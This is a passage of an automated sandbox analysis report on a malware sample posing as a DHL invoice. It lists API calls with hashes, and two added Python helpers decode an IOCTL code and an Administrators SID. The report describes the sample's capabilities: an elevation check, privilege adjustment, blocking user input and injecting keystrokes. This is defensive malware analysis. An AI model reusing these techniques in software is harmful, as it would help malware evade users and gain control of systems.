• Instruction Fuzzy Hash: A711A175E01228BFDB118F95EC45FAFBFBCEB45B50F108115F908E7290C2705A018BA1
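
The DeviceIoControl record above is only useful once the control code is decoded. The helper below is an added analyst aid, not part of the Joe Sandbox report or of the sample: it splits 0x2D1400 into its CTL_CODE fields (device type, function, method, access) and compares the 0xC-byte input and 0x28-byte output sizes shown in the record against the fixed-size structures that IOCTL_STORAGE_QUERY_PROPERTY exchanges. The control-code and structure-size constants are the public winioctl.h definitions; the reading that a 40-byte output buffer requests only the STORAGE_DEVICE_DESCRIPTOR header (bus type, no vendor/product strings) is an inference from the sizes, not something the report states.

```python
# Added analyst helper for the CreateFileW/DeviceIoControl/CloseHandle record above.
# Not part of the Joe Sandbox report or of the sample. Decodes the control code 0x2D1400
# and the 0xC / 0x28 buffer sizes that appear as DeviceIoControl arguments in the record.

# CTL_CODE layout from winioctl.h: DeviceType<<16 | Access<<14 | Function<<2 | Method
DEVICE_TYPES = {
    0x07: "FILE_DEVICE_DISK",
    0x09: "FILE_DEVICE_FILE_SYSTEM",
    0x12: "FILE_DEVICE_NETWORK",
    0x2D: "FILE_DEVICE_MASS_STORAGE",
}
METHODS = ["METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER"]
ACCESS = ["FILE_ANY_ACCESS", "FILE_READ_ACCESS", "FILE_WRITE_ACCESS",
          "FILE_READ_ACCESS|FILE_WRITE_ACCESS"]


def ctl_code(device_type, function, method, access):
    """Same bit packing as the CTL_CODE macro in winioctl.h."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


# A few public storage/disk IOCTLs, computed from their macro arguments rather than
# hard-coded, so the encoding itself is checkable against the published values.
KNOWN_IOCTLS = {
    ctl_code(0x2D, 0x0500, 0, 0): "IOCTL_STORAGE_QUERY_PROPERTY",    # 0x2D1400
    ctl_code(0x2D, 0x0420, 0, 0): "IOCTL_STORAGE_GET_DEVICE_NUMBER",  # 0x2D1080
    ctl_code(0x2D, 0x0202, 0, 1): "IOCTL_STORAGE_EJECT_MEDIA",        # 0x2D4808
    ctl_code(0x07, 0x0000, 0, 0): "IOCTL_DISK_GET_DRIVE_GEOMETRY",    # 0x00070000
}

# Fixed-size structures exchanged through IOCTL_STORAGE_QUERY_PROPERTY (winioctl.h).
SIZEOF_STORAGE_PROPERTY_QUERY = 12     # PropertyId, QueryType, AdditionalParameters[1] + padding
SIZEOF_STORAGE_DEVICE_DESCRIPTOR = 40  # fixed header incl. BusType; strings follow if buffer is larger


def decode_ioctl(code):
    """Split a control code into its CTL_CODE fields and name it if it is in the table."""
    device = (code >> 16) & 0xFFFF
    return {
        "code": code,
        "name": KNOWN_IOCTLS.get(code),
        "device_type": DEVICE_TYPES.get(device, hex(device)),
        "function": (code >> 2) & 0xFFF,
        "method": METHODS[code & 0x3],
        "access": ACCESS[(code >> 14) & 0x3],
    }


def classify_storage_query(code, in_size, out_size):
    """Interpret the (dwIoControlCode, nInBufferSize, nOutBufferSize) triple of a DeviceIoControl call.

    The 'header only' verdict is an inference from the sizes: a 40-byte output buffer holds
    exactly STORAGE_DEVICE_DESCRIPTOR's fixed header (BusType included) and no vendor,
    product or serial strings, which is what a bus-type query needs and nothing more.
    """
    info = decode_ioctl(code)
    if info["name"] != "IOCTL_STORAGE_QUERY_PROPERTY":
        return "%s: not a storage property query" % (info["name"] or hex(code))
    if in_size != SIZEOF_STORAGE_PROPERTY_QUERY:
        return "IOCTL_STORAGE_QUERY_PROPERTY with unexpected input size %d" % in_size
    if out_size == SIZEOF_STORAGE_DEVICE_DESCRIPTOR:
        return "IOCTL_STORAGE_QUERY_PROPERTY: fixed STORAGE_DEVICE_DESCRIPTOR header only (bus type, no strings)"
    return "IOCTL_STORAGE_QUERY_PROPERTY: descriptor with %d bytes for variable-length data" % (
        out_size - SIZEOF_STORAGE_DEVICE_DESCRIPTOR)


if __name__ == "__main__":
    # Arguments as listed in the record: DeviceIoControl(hDevice, 0x2D1400, in, 0xC, out, 0x28, ...)
    print(decode_ioctl(0x2D1400))
    print(classify_storage_query(0x2D1400, 0xC, 0x28))
```

The CreateFileW call in the same record opens its target with dwDesiredAccess 0x80 (FILE_READ_ATTRIBUTES), OPEN_EXISTING and FILE_ATTRIBUTE_NORMAL; that is the minimum needed to send a FILE_ANY_ACCESS IOCTL to a volume or drive handle, consistent with a read-only hardware query rather than a write to the device.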
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0039168C
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 003916A1
• FreeSid.ADVAPI32(?), ref: 003916B1
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
• Opcode ID: 2e41b33a641486af0e3d3d6bcc38b73e1f903bb5e3c5962d8f3835959a37bb92
• Instruction ID: 4ba5c7f60f2a58d293f6a71a2878d68bf2faafe9ea32e2bf6cb027b93f617523
• Opcode Fuzzy Hash: 2e41b33a641486af0e3d3d6bcc38b73e1f903bb5e3c5962d8f3835959a37bb92
• Instruction Fuzzy Hash: D4F0F4B1950309FBDF01DFE49C89EAEBBBCFB08704F504565E901E2181E774EA448B54
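
The AllocateAndInitializeSid/CheckTokenMembership/FreeSid record above is the standard "is the caller an administrator" check, but that only becomes visible once the SID is rebuilt from the arguments. The helper below is an added analyst aid, not part of the Joe Sandbox report or of the sample: it takes the nSubAuthorityCount (2) and the sub-authority slots (0x20, 0x220, then zeros) exactly as the record lists them and produces the binary SID and its S-1-... string. The identifier authority is passed by pointer and shows as "?" in the record, so SECURITY_NT_AUTHORITY (5) is assumed; under that assumption the SID is S-1-5-32-544, BUILTIN\Administrators. The well-known-SID table in the code is a small constructed lookup for illustration.

```python
# Added analyst helper for the AllocateAndInitializeSid/CheckTokenMembership/FreeSid record above.
# Not part of the Joe Sandbox report or of the sample. Rebuilds the SID the call constructs.
# ASSUMPTION: the identifier authority (a pointer argument, "?" in the record) is
# SECURITY_NT_AUTHORITY; only the sub-authority count and values are visible in the report.
import struct

SECURITY_NT_AUTHORITY = 5
SECURITY_WORLD_SID_AUTHORITY = 1
SID_MAX_SUB_AUTHORITIES = 15

# Small constructed lookup of well-known SIDs for labelling results.
WELL_KNOWN = {
    "S-1-1-0": "Everyone",
    "S-1-5-18": "NT AUTHORITY\\SYSTEM",
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-32-545": "BUILTIN\\Users",
}


def build_sid(authority, *sub_authorities):
    """Mirror AllocateAndInitializeSid's output layout: revision 1, sub-authority count,
    48-bit big-endian identifier authority, then little-endian 32-bit sub-authorities."""
    if not 0 < len(sub_authorities) <= SID_MAX_SUB_AUTHORITIES:
        raise ValueError("sub-authority count must be 1..%d" % SID_MAX_SUB_AUTHORITIES)
    return (bytes([1, len(sub_authorities)])
            + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in sub_authorities))


def sid_to_string(sid):
    """Render a binary SID as S-R-A-S1-S2..., refusing truncated or non-revision-1 data."""
    if len(sid) < 8:
        raise ValueError("SID shorter than its fixed header")
    rev, count = sid[0], sid[1]
    if rev != 1 or count > SID_MAX_SUB_AUTHORITIES or len(sid) != 8 + 4 * count:
        raise ValueError("malformed SID")
    authority = int.from_bytes(sid[2:8], "big")
    subs = struct.unpack("<%dI" % count, sid[8:])
    return "S-%d-%d" % (rev, authority) + "".join("-%d" % s for s in subs)


def describe_sid(sid):
    """Return (string form, well-known name or placeholder)."""
    s = sid_to_string(sid)
    return s, WELL_KNOWN.get(s, "(not in table)")


def sid_from_report_args(sub_count, *sub_slots, authority=SECURITY_NT_AUTHORITY):
    """Build the SID from nSubAuthorityCount and the eight dwSubAuthority slots as the
    report prints them (unused slots are 0). 'authority' is the assumed, unseen value."""
    if sub_count > len(sub_slots):
        raise ValueError("count exceeds the slots given")
    return build_sid(authority, *sub_slots[:sub_count])


if __name__ == "__main__":
    # Slots copied from the record: (?, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, ?, ?)
    sid = sid_from_report_args(0x2, 0x20, 0x220, 0, 0, 0, 0, 0, 0)
    print(sid.hex(" "), describe_sid(sid))
    # CheckTokenMembership(NULL, sid, &is_member) then asks whether the current thread's
    # token holds this group enabled; the result is what the caller branches on.
```

Because CheckTokenMembership consults the effective token, this check answers "is the token currently elevated", not "does the account belong to Administrators"; under UAC a filtered token of an administrator account returns FALSE here.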
APIs
• GetCurrentProcess.KERNEL32(003628E9,?,00354CBE,003628E9,003F88B8,0000000C,00354E15,003628E9,00000002,00000000,?,003628E9), ref: 00354D09
• TerminateProcess.KERNEL32(00000000,?,00354CBE,003628E9,003F88B8,0000000C,00354E15,003628E9,00000002,00000000,?,003628E9), ref: 00354D10
• ExitProcess.KERNEL32 ref: 00354D22
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: e59e2c50860c224cd867c0f92e482a666c24c48e702f37a6363ca17f5db2ee5f
• Instruction ID: 0765d98dee9a788d01b1a8da1390804827760c0da87ace476efdf78f757a6b39
• Opcode Fuzzy Hash: e59e2c50860c224cd867c0f92e482a666c24c48e702f37a6363ca17f5db2ee5f
• Instruction Fuzzy Hash: DFE09231410188ABCB16AF54EE09E583BA9AB41786F159018FC098B133CB3AE986CB90
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID:
• String ID: /
• API String ID: 0-2043925204
• Opcode ID: aad2d7cdedc2058f7affeede67c4e62502cf105445713f730075560273c1c41a
• Instruction ID: cb6919c20c520b5182a3ac5e288743cb954d780f89be4fd0a97b8e03b52f82ab
• Opcode Fuzzy Hash: aad2d7cdedc2058f7affeede67c4e62502cf105445713f730075560273c1c41a
• Instruction Fuzzy Hash: F64149769002196FCB21DFB9CC5CDBB7778EB84314F208669F945CB284E6709D41CB50
APIs
• GetUserNameW.ADVAPI32(?,?), ref: 0038D28C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: NameUser
• String ID: X64
• API String ID: 2645101109-893830106
• Opcode ID: 86eba263fb376722b1e9f2a3a6828ea27b0ce143c6e5556056b2fbbb0894293b
• Instruction ID: 363d56b22d780909813bd55e568af4b2faaecc502cdb76d6a3c820b3b231020f
• Opcode Fuzzy Hash: 86eba263fb376722b1e9f2a3a6828ea27b0ce143c6e5556056b2fbbb0894293b
• Instruction Fuzzy Hash: 8ED0C9B481112DEACB91DB90EC88DD9B3BCBB04305F100591F106E2440D730A5488F10
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
• Instruction ID: f76c324b289243f8693f42b04ab4b297a4ecee824b769ca2411fc15330637f63
• Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
• Instruction Fuzzy Hash: F2022C71E102199FDF15CFA9C880AADFBF1EF48319F259169D819EB390D731AA45CB80
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID:
• String ID: Variable is not of type 'Object'.$p#@
• API String ID: 0-655357629
• Opcode ID: 80e33b9ab4e10a29c21604e75621f520cdf1e5b804335a7ef7220570b09f4fda
• Instruction ID: de056fd003c6b108c66c28cd131e343256a9a302ac1dea53186fc0103097868c
• Opcode Fuzzy Hash: 80e33b9ab4e10a29c21604e75621f520cdf1e5b804335a7ef7220570b09f4fda
• Instruction Fuzzy Hash: 1532AE34910218DBCF1AEF90C9C1AEDB7B9BF05304F1550A9E806BF292D775AE49CB50
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 003A6918
• FindClose.KERNEL32(00000000), ref: 003A6961
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: 4c2ddd1b6423d6a46ac7d4afdd1ed68ea5c801242453ba065ef2a9f94e2d715b
• Instruction ID: 2e1a02ba322a66087af522935cace89899ae4c91850f513adfc575a51bf61fab
• Opcode Fuzzy Hash: 4c2ddd1b6423d6a46ac7d4afdd1ed68ea5c801242453ba065ef2a9f94e2d715b
• Instruction Fuzzy Hash: 7311D0356142009FC711CF29C4C9A16BBE4FF89328F09C69DE4698F6A2CB30EC05CB90
APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,003B4891,?,?,00000035,?), ref: 003A37E4
• FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,003B4891,?,?,00000035,?), ref: 003A37F4
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
• Opcode ID: 1cc43e238fce0cbd9975b9465255a25540994e0cccb793747070d5bc6c6bf202
• Instruction ID: 15bcf667a97e9d6ffcfa69f812351a6d6ddffe552c7bf640785b202ce22031f9
• Opcode Fuzzy Hash: 1cc43e238fce0cbd9975b9465255a25540994e0cccb793747070d5bc6c6bf202
• Instruction Fuzzy Hash: 4DF0E5B16053286AEB2257669C4DFEB3AAEEFC5761F000265F509D2281D9A09904C7B0
APIs
• SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0039B25D
• keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 0039B270
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: InputSendkeybd_event
• String ID:
• API String ID: 3536248340-0
• Opcode ID: 7b2976840c5976b8cd3bb0e60f15c41a1f44b51e558dc0bcb9409b9e239ad7da
• Instruction ID: d03bd8d88810756b560ab416273272ea8ed65d5895f6c44b29fd36be6072136f
• Opcode Fuzzy Hash: 7b2976840c5976b8cd3bb0e60f15c41a1f44b51e558dc0bcb9409b9e239ad7da
• Instruction Fuzzy Hash: 73F06D7080424DABDF069FA0C805BAEBBB4FF04305F00840AF955E5192C37992019F94
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003911FC), ref: 003910D4
• CloseHandle.KERNEL32(?,?,003911FC), ref: 003910E9
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
• String ID:
• API String ID: 81990902-0
• Opcode ID: fb3b2fd9df45638ca5efdff4ec11cd5b418d52267527353e506fdbd5644ba3eb
• Instruction ID: 88e9f763a27dc47ace0d1d6b0b452fb8d537e97a478c1ff1737e332bb70e5eca
• Opcode Fuzzy Hash: fb3b2fd9df45638ca5efdff4ec11cd5b418d52267527353e506fdbd5644ba3eb
• Instruction Fuzzy Hash: 7AE0BF72014651AEE7262B51FC05E7777EDFB04311F14882DF5A6844B5DB62BC90DB50
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00366766,?,?,00000008,?,?,0036FEFE,00000000), ref: 00366998
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
• Opcode ID: 5b6a1589b80ec558d59c3fe25b0cdd221120a2112f4893ef341921830b32eaa3
• Instruction ID: d7ed77ba6054bb5d523508c280ce8799470c110edab6bdb84e16fb58a09c3699
• Opcode Fuzzy Hash: 5b6a1589b80ec558d59c3fe25b0cdd221120a2112f4893ef341921830b32eaa3
• Instruction Fuzzy Hash: DAB13A716106089FD716CF28C48AB657BE0FF453A4F2AC65CE899CF2A6C335E991CB40
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID:
• String ID:
• API String ID: 0-3916222277
• Opcode ID: 91a2cac8dc4da12abc6023437480da3687d9d64314569f624b018ad9a39e2a4a
• Instruction ID: 21f3bb1cb53c90364f522f1f1585a802f9efaf1e54ae6137473967c12c668fc0
• Opcode Fuzzy Hash: 91a2cac8dc4da12abc6023437480da3687d9d64314569f624b018ad9a39e2a4a
• Instruction Fuzzy Hash: 67126E759002299FCB26DF59C880AEEB7F5FF48310F55819AE849EB251DB709E81CF90
APIs
• BlockInput.USER32(00000001), ref: 003AEABD
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: BlockInput
• String ID:
• API String ID: 3456056419-0
• Opcode ID: 94c4fddd41e4fd3c6d9e8af8e0175542941e9220c4715b5238f79e0e7ffe22e8
• Instruction ID: d473bd03eb43609c711225ce92a3f5e91156f8c4a38fb40925a843746b9f566c
• Opcode Fuzzy Hash: 94c4fddd41e4fd3c6d9e8af8e0175542941e9220c4715b5238f79e0e7ffe22e8
• Instruction Fuzzy Hash: 92E01A362202049FD711EF59D844E9AF7EDEF99760F00841AFD49DB351DA70AC408B90
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,003503EE), ref: 003509DA
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 7e3fb02ebf6dc3b12a4f888f200c6e03437fce0a10f339fec2caa037051c5189
• Instruction ID: 6194fd11ecca6938c5ef420c80c741148b50d3afcd87d08ef425616cca335706
• Opcode Fuzzy Hash: 7e3fb02ebf6dc3b12a4f888f200c6e03437fce0a10f339fec2caa037051c5189
• Instruction Fuzzy Hash:
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID:
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 0-4108050209
                                                                                                                        • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                                        • Instruction ID: f1968dd1a50a5da8f6c701b57a2c3476d648fbefaa0fa1e4bd4f40afd9bb10d0
                                                                                                                        • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                                        • Instruction Fuzzy Hash: 7F51677160C6455BDB3B8628A85FFFE23999B12343F190509DC82DB6B2C715EE0DD3A2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0&@
                                                                                                                        • API String ID: 0-1848180278
                                                                                                                        • Opcode ID: 5bec0f454ff8e4b06f871400d07f5d20693cbe5e45254eb8c834d25586d0f7ff
                                                                                                                        • Instruction ID: 9de7b97fbf7528f52a019c4a515bdacf3607961dc7c54bf4d612678c579202fe
                                                                                                                        • Opcode Fuzzy Hash: 5bec0f454ff8e4b06f871400d07f5d20693cbe5e45254eb8c834d25586d0f7ff
                                                                                                                        • Instruction Fuzzy Hash: 2521D5322206118BD728CE79C92267F73E5EB54310F158A2EE4A7D73D0DE7AA904DB84
                                                                                                                        Memory Dump Source
